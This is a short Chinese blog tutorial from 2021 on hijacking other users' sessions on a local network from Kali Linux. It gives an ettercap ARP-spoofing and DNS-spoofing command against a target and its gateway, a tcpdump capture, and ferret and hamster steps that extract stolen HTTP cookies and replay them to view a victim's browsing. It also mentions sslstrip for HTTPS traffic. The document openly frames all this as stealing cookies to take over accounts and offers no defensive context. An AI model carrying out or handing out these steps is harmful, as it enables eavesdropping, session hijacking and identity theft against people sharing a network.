获得用户未授权信息,进而盗用身份的过程,攻击者可能使用此信息打开新账号或者获取用户已存在账号的访问权限

盗取用户cookie

本次教程基于kali
所需工具:

  1. apspoof arp欺骗
  2. tcpdump 网口 HTTP抓包
  3. ferret 解析提取 pcap抓包文件
  4. hamster 使用抓到得cookie

挨个安装这几个工具

让用户流量过你这 来进行抓包

盗取cookie

本次教程 基于抓取 http cookie
抓取https请使用,sslstrip ssldump 工具

流量欺骗

想办法让用户流量过你这,这里用arp欺骗流量

ettercap -Tq -i 设备当前网卡 -M arp:remote -P dns_spoof /靶机IP// /网关ip//

靶机网速会非常慢原因未知

开始抓包

tcpdump -i 设备当前网卡 -w ./cookie.pcap

将用户流量欺骗过来了后
对流量经过得网卡抓包,保存cookie.pcap文件
按住CTRL+c 停止抓包

解析提取包文件

ferret -r ./cookie.packerret

cookie.PNG
文件提取完成,
当前目录下会多一个hamster.txt文件

这就是需要得东西了

把hamster.txt文件移动到/root 路径下

让hamster工具能读取到hamster.txt文件

开始使用cookie

hamster

回车执行
就会读取 /root路径下 hamster.txt 文件

浏览器打开127.0.0.1:1234
访问到本地了
cookie.PNG

可以看到 两个IP 188.8.8.102 188.8.8.109
188.8.8.102测试靶机IP

可以看到刚才用户 刷过得短视频等等
这里只是打开视频得URL地址
这只是一个小玩法,其他自己研究

cookie.1.jpg

最后修改:2021 年 07 月 28 日
© 允许规范转载
如果觉得我的文章对你有用,请随意赞赏